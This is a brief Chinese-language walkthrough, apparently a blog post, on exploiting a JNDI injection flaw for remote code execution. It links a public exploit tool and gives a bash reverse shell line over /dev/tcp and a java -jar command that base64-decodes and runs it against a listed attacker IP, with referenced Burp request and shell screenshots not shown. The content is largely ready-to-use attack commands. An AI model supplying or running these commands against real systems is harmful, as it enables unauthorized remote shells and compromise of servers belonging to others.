1.漏洞检测
漏洞检测使用的是BP插件,插件地址。

2.利用
JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下:
将以下命令进行base64编码,IP替换为你攻击机IP。
bash -i >& /dev/tcp/x.x.x.x/6553 0>&1

使用工具命令如下:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,base64编码}|{base64,-d}|{bash,-i}" -A 120.77.202.2

burp发包:

反弹shell成功:

本文介绍了一种利用JNDI注入进行远程代码执行的方法,并提供了详细的工具使用步骤和命令示例,展示了如何通过特定命令实现目标主机的反弹Shell。
2174

被折叠的 条评论
为什么被折叠?



